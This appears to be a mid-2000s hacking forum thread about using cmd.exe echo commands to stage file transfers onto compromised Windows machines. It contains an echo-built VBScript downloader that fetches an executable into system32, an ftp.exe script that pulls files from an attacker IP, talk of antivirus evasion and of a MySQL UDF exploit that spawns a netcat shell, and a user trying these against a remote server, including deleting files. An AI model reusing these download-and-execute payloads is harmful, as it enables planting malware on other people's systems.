Forums: Echo Commands - Forums

Jump to content

  • (3 Pages)
  • +
  • 1
  • 2
  • 3
  • You cannot start a new topic
  • You cannot reply to this topic

Echo Commands echo commands

#16 User is offline   droppunx 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 91
  • Joined: 24-February 04

Posted 10 December 2004 - 06:02 PM

jubbly, on Dec 11 2004, 12:21 AM, said:

tibbar, on Dec 4 2004, 11:36 PM, said:

note that only port 21 works properly on ftp.exe


Thats not entirely true as I have used it many times with obscure port numbers.

Although this post is attracting lame people putting serv-u on peeps comps which I believe to be against forum rules posting about such crap.


The TCP port used by the remote computer executing ftp.exe IS AND ONLY CAN BE port 21. Sure ftp.exe may be able to connect to obscure ports, which I'm assuming is what you're referring to, but the port used for that outgoing connection has to be port 21.

Also to reply to your snide comment I've used ftp.exe hundreds of times on old slow piece of shit computers running Win98 or Win95 that I don't want to bog down with GUI FTP software. ftp.exe commands are very helpful to know, not just for serv-u-installing hackers. If you're going to attack people who discuss potential methods of file uploading remotely, make sure you include all the posts on here about vbs scripts, .bat files, etc etc etc <_<
0

#17 User is offline   ScuD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 30-January 04

Posted 09 February 2005 - 09:35 AM

all these echo commands are for ftp.exe...

do not forget there are other ways to, to transfer files through cmd.exe

rcp.exe, tftp.exea and http...

i'm using http always, it's a lot faster and always works fine, never had any probs with it

grtz
0

#18 User is offline   ldm 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 24
  • Joined: 02-September 04

Posted 10 February 2005 - 04:40 AM

ScuD, on Feb 9 2005, 12:35 PM, said:

i'm using http always, it's a lot faster and always works fine, never had any probs with it

grtz


can you explain how this way works ??

very thanks
0

#19 User is offline   ScuD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 30-January 04

Posted 10 February 2005 - 10:48 AM

ldm, on Feb 10 2005, 12:40 PM, said:

ScuD, on Feb 9 2005, 12:35 PM, said:

i'm using http always, it's a lot faster and always works fine, never had any probs with it

grtz


can you explain how this way works ??

very thanks


i didn't write this myself, i just googled a bit and found this .vbs script.

echo Dim DataBin >>c:\http.vbs
echo Dim HTTPGET >>c:\http.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\http.vbs
echo HTTPGET.Open "GET", "http://yourwebsite.be/kit.exe", False >>c:\http.vbs 
echo HTTPGET.Send >>c:\http.vbs
echo DataBin = HTTPGET.ResponseBody >>c:\http.vbs
echo Const adTypeBinary=1 >>c:\http.vbs
echo Const adSaveCreateOverWrite=2 >>c:\http.vbs
echo Dim SendBinary >>c:\http.vbs
echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\http.vbs
echo SendBinary.Type = adTypeBinary >>c:\http.vbs
echo SendBinary.Open >>c:\http.vbs
echo SendBinary.Write DataBin >>c:\http.vbs
echo SendBinary.SaveToFile "c:\windows\system32\kit.exe", adSaveCreateOverWrite >>c:\http.vbs


i must say that i forgot where i've found this script...

Grtz & peace

ScuD
0

#20 User is offline   nick0 

  • Private
  • Icon
  • Group: Members
  • Posts: 8
  • Joined: 19-September 03

Posted 10 February 2005 - 08:58 PM

iv tried .vbs scripts b4...
they get detected by AV's...
useless.
0

#21 User is offline   ScuD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 30-January 04

Posted 11 February 2005 - 10:13 AM

nick0, on Feb 11 2005, 05:58 AM, said:

iv tried .vbs scripts b4...
they get detected by AV's...
useless.


lol that's bullsh*t...

always works over here... with or without AV...

i think the only AV that could give some trouble is F-secure...

grtz
0

#22 User is offline   tweety 

  • Private
  • Icon
  • Group: Members
  • Posts: 5
  • Joined: 01-October 04

Posted 14 February 2005 - 02:48 AM

Hi i`Ve question:
Isn`t is posiible to use echo commands fpr MySQL???
tftp command works but i hate it :D
I wanna use ftp

PLEASY help

THX
0

#23 User is offline   ScuD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 30-January 04

Posted 14 February 2005 - 02:51 AM

@tweety:

jip off course it's possible... just copy / paste the echo-commands in your cmd.exe


grtz
0

#24 User is offline   tweety 

  • Private
  • Icon
  • Group: Members
  • Posts: 5
  • Joined: 01-October 04

Posted 14 February 2005 - 03:07 AM

ScuD, on Feb 14 2005, 11:51 AM, said:

@tweety:

jip off course it's possible... just copy / paste the echo-commands in your cmd.exe


grtz



i copy an paste is but nothing happens. there`s no .txt in c:\\
I use MysqlExec.
i patest like

echo ip>>ftp.txt
an i used things like echo ip>>c:\\ftp
and /cmd.exe echo ip_ftp.exe
but nothing works please help

THX
0

#25 User is offline   ScuD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 30-January 04

Posted 14 February 2005 - 03:32 AM

tweety, on Feb 14 2005, 12:07 PM, said:

ScuD, on Feb 14 2005, 11:51 AM, said:

@tweety:

jip off course it's possible... just copy / paste the echo-commands in your cmd.exe


grtz



i copy an paste is but nothing happens. there`s no .txt in c:\\
I use MysqlExec.
i patest like

echo ip>>ftp.txt
an i used things like echo ip>>c:\\ftp
and /cmd.exe echo ip_ftp.exe
but nothing works please help

THX



echo open <IP> 21 >> c:\a
echo user anonymous anonymous >> c:\a
echo get <FILES> >> c:\a
echo QUIT >> c:\a
ftp -i -n -v -s:c:\a

use these commands and it will work perfect ;)

i'm sure :)
0

#26 User is offline   tweety 

  • Private
  • Icon
  • Group: Members
  • Posts: 5
  • Joined: 01-October 04

Post icon  Posted 14 February 2005 - 03:41 AM

ScuD, on Feb 14 2005, 12:32 PM, said:

tweety, on Feb 14 2005, 12:07 PM, said:

ScuD, on Feb 14 2005, 11:51 AM, said:

@tweety:

jip off course it's possible... just copy / paste the echo-commands in your cmd.exe


grtz



i copy an paste is but nothing happens. there`s no .txt in c:\\
I use MysqlExec.
i patest like

echo ip>>ftp.txt
an i used things like echo ip>>c:\\ftp
and /cmd.exe echo ip_ftp.exe
but nothing works please help

THX



echo open <IP> 21 >> c:\a
echo user anonymous anonymous >> c:\a
echo get <FILES> >> c:\a
echo QUIT >> c:\a
ftp -i -n -v -s:c:\a

use these commands and it will work perfect ;)

i'm sure :)



:unsure: :unsure: :unsure: :unsure: :unsure:
sry but it doesn`T work there no txt file on c:

fuckin ;MySql ;) :blink: :huh: :(
0

#27 User is offline   ScuD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 30-January 04

Posted 14 February 2005 - 05:30 AM

are you sure echo command is working, cos when it isn't working the above echo commands for ftp won't work

howto check?

type in cmd:

Microsoft Windows XP [versie 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>echo 123
123

C:\WINDOWS\system32>

this should be the result, if not then echo is disabled.

grtz
0

#28 User is offline   tweety 

  • Private
  • Icon
  • Group: Members
  • Posts: 5
  • Joined: 01-October 04

Posted 14 February 2005 - 06:01 AM

SRY DO U know what im mean with MySQL NOT MSSQL!
I think echo don`t work in MYSQL ind MSSQL it does verry well:D

SO I`ve to use TFTPD fuckin MYSQL:D
0

#29 User is offline   ScuD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 63
  • Joined: 30-January 04

Posted 14 February 2005 - 07:21 AM

Quote

SRY DO U know what im mean with MySQL NOT MSSQL!
I think echo don`t work in MYSQL ind MSSQL it does verry well:D


lol yes i can read since mYsql difference from mSsql :P The mysql i know is with the myudf exploit... and since myudf opens up a nc.exe on port 21000 and you got to connect through telnet to it... you should be able to use echo commands...

if ftp aint working try rcp then...

grtz

edit: i'm talking bout the mysql on port 3306

if you are talking bout something else :s i can't help ya :-/
0

#30 User is offline   tweety 

  • Private
  • Icon
  • Group: Members
  • Posts: 5
  • Joined: 01-October 04

Post icon  Posted 14 February 2005 - 07:41 AM

ScuD, on Feb 14 2005, 04:21 PM, said:

Quote

SRY DO U know what im mean with MySQL NOT MSSQL!
I think echo don`t work in MYSQL ind MSSQL it does verry well:D


lol yes i can read since mYsql difference from mSsql :P The mysql i know is with the myudf exploit... and since myudf opens up a nc.exe on port 21000 and you got to connect through telnet to it... you should be able to use echo commands...

if ftp aint working try rcp then...

grtz

edit: i'm talking bout the mysql on port 3306

if you are talking bout something else :s i can't help ya :-/

:D :D :D

nice:D i mean it 2!

do you kno the tool mysqlexec? i?ve connected with tha without any other tool. Do i nedd an extra tool ore s.th. like that, to be able tu use echo commands??
grrrr it suxx lol

echo open 111.111.1.1>>c:\\ftp.txt is the command i use and it doemst work! :angry:

2nd question i have: i tried to del a file
i wrote del c:\\ an the i pusht enter , grrr
and the server asks me this:
c:*, Are you sure (Y/N)?
what ever i do the server asks me this i cann`T change directory ore something like that, whats to do here???

pls help me :excl: :excl: :excl:
0

  • (3 Pages)
  • +
  • 1
  • 2
  • 3
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting